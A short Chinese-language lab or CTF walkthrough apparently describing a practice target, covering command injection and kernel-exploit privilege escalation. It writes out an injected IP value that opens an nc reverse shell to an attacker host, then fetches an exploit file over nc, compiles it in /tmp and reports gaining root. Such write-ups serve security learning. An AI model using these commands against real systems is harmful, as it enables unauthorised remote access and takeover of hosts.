level-2-(nc与内核漏洞提权)

续上篇 

192.168.1.1;/usr/local/bin/nc 攻击机ip 6666 -e /bin/sh

::: {.image-package}
\

::: {.image-caption}
:::
:::

于是获得了 sh类型的shell

攻击机输入下面命令,目的是监听666端口,如果有主机连上它,就发送hole.c

::: {.image-package}
\

::: {.image-caption}
:::
:::

shell上输入下面命令,目的是连接攻击机ip和端口。获得了hole.c文件,在屏幕上输入了该文件。但没办法光在shell上输出没有用,不能写入到一个文件中去。。

::: {.image-package}
\

::: {.image-caption}
:::
:::

如果输入nc,会显示没有找到该命令

输入 /usr/local/bin/nc 攻击IP 666 > file  
,意思是将666端口的文件存为file,但是显示没有这样的文件或目录,为了弄清问题出在哪,输入touch
file

::: {.image-package}
\

::: {.image-caption}
图4
:::
:::

如果touch file,会显示不能新建file文件,请求拒绝。还是权限不够的问题吧


尝试wget也是权限不够,nc也没用。

于是用 ls 查看权限,唉都是管理员权限的文件

::: {.image-package}
\

::: {.image-caption}
:::
:::

用pwd查看当前路径,cd ~

找到了一个有权限的 /tmp

于是执行图4,这次没有报错

gcc -o yes file

显示不知道file的类型

mv file file.c 更改文件名

gcc -o yes file.c

./yes

::: {.image-package}
\

::: {.image-caption}
:::
:::

权限到手!- v -
:::
:::
:::